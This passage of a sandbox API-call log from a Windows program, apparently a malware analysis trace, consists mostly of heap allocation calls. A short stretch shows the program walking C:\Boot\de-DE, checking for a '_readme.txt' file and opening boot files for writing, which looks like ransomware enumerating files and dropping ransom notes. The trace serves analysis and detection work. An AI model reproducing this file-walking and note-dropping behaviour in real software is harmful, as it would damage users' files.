(HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.027] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.027] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.027] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.027] PathFindFileNameW (pszPath="") returned="" [0093.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.027] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.028] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.028] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.028] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0093.029] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0093.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.029] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0093.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.029] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.029] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.029] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.029] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0093.029] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.030] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned=".txt" [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa328e000, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa328e000, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa328e000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.030] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.030] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.030] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.032] RtlAllocateHeap 